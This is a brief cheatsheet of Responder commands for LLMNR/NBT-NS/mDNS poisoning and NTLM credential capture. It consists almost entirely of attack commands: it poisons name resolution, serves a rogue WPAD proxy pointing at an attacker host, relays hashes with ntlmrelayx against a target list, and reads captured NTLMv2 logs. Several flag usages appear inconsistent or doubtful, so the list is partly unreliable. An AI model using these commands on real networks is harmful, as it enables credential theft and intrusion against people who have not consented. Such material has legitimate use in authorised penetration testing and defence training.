
Responder Cheatsheet
The Ultimate LLMNR/NBT-NS/MDNS Poisoning & Credential Capture Guide
Basic Responder Usage
responder -I eth0
responder --list-interfaces
responder -I eth0 -wrf
responder -I eth0 --disable-http
responder -I eth0 --disable-smb
responder -I eth0 --wpad --proxy="http://attacker:8080"
Poisoning Attacks
responder -I eth0 -v
responder -I eth0 -w
responder -I eth0 -f
responder -I eth0 -s
responder -I eth0 -r
responder -I eth0 -d
responder -I eth0 -l
Credential Capture
responder -I eth0 -v
responder -I eth0 -r -b
responder -I eth0 --lm
cat /usr/share/responder/logs/*.txt
ntlmrelayx.py -tf targets.txt -smb2support
Advanced Attacks
responder -I eth0 -A 192.168.1.10,192.168.1.20
responder -I eth0 -q
responder -I eth0 -6
responder -I eth0 --analyze
Logs & Output
ls /usr/share/responder/logs/
cat /usr/share/responder/logs/HTTP-NTLMv2-*.txt
cat /usr/share/responder/logs/SMB-NTLMv2-*.txt
cat /usr/share/responder/logs/HTTP-*-WPAD.txt